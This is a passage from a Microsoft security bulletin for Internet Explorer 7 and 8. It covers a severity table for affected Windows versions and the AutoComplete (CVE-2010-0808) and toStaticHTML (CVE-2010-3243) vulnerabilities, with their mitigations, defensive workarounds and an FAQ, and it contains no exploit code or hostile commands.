Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 for Windows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 in Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 7 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2**\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2**\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 7 in Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\nInternet Explorer 8\t \t \t \t \t \t \t \t \t \t \t \r\n\r\nInternet Explorer 8 for Windows XP Service Pack 3\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 for Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 for Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 for Windows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows 7 for 32-bit Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows 7 for x64-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nInternet Explorer 8 in Windows Server 2008 R2 for x64-based Systems**\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\nInternet Explorer 8 in Windows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nModerate \r\nInformation Disclosure\r\n\t\r\n\r\nModerate \r\nRemote Code Execution\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nLow \r\nInformation Disclosure\r\n\t\r\n\r\nImportant \r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\r\n**Server Core installation not affected. The vulnerabilities addressed by this update do not affect supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, when installed using the Server Core installation option. For more information on this installation option, see the TechNet articles, Managing a Server Core Installation and Servicing a Server Core Installation. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nAutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nAn information disclosure vulnerability exists that potentially allows form data within Internet Explorer to be captured via the AutoComplete feature. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could allow information disclosure if a user viewed the Web page. An attacker who successfully exploited this vulnerability could capture information previously entered into fields after the AutoComplete feature has been enabled.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0808.\r\n\t\r\nMitigating Factors for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for AutoComplete Information Disclosure Vulnerability - CVE-2010-0808\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could capture content entered into form fields if the AutoComplete feature has been enabled.\r\n\r\nWhat causes the vulnerability? \r\nInternet Explorer allows for automated, scripted instructions to simulate user actions on the AutoComplete feature.\r\n\r\nWhat is the AutoComplete feature? \r\nAutoComplete is a feature in Internet Explorer that helps users quickly enter information in form fields. For more information, see the MSDN article, Using AutoComplete in HTML Forms.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could potentially capture data previously entered into forms in the browser. The AutoComplete feature is disabled by default.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the AutoComplete feature within Internet Explorer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-0808.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nHTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nAn information disclosure vulnerability exists in the way that the toStaticHTML API sanitizes HTML, that could allow an attacker to perform cross-site scripting attacks and run script in the security context of the logged-on user. An attacker who successfully exploited this vulnerability could execute a cross-site scripting attack on the user, allowing the attacker to execute script in the user's security context against a site that is using the toStaticHTML API.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3243.\r\n\t\r\nMitigating Factors for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See the FAQ subsection of this vulnerability section for more information about Internet Explorer Enhanced Security Configuration.\r\n\u2022\t\r\n\r\nOnly Web sites that is using toStaticHTML may potentially be affected.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for HTML Sanitization Vulnerability - CVE-2010-3243\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nRead e-mails in plain text\r\n\r\nTo help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.\r\n\r\nMicrosoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Office Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nSet Internet and Local intranet security zone settings to "High" to block ActiveX Controls and Active Scripting in these zones\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings for the Internet security zone to block ActiveX controls and Active Scripting. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of workaround. There are side effects to blocking ActiveX Controls and Active Scripting. Many Web sites that are on the Internet or on an intranet use ActiveX or Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX Controls to provide menus, ordering forms, or even account statements. Blocking ActiveX Controls or Active Scripting is a global setting that affects all Internet and intranet sites. If you do not want to block ActiveX Controls or Active Scripting for such sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to block ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect yourself from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\r\n\r\nYou can help protect against exploitation of this vulnerability by changing your settings to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nNote Disabling Active Scripting in the Internet and Local intranet security zones may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly.\r\n\r\nImpact of workaround. There are side effects to prompting before running Active Scripting. Many Web sites that are on the Internet or on an intranet use Active Scripting to provide additional functionality. For example, an online e-commerce site or banking site may use Active Scripting to provide menus, ordering forms, or even account statements. Prompting before running Active Scripting is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run Active Scripting. If you do not want to be prompted for all these sites, use the steps outlined in "Add sites that you trust to the Internet Explorer Trusted sites zone".\r\n\r\nAdd sites that you trust to the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX 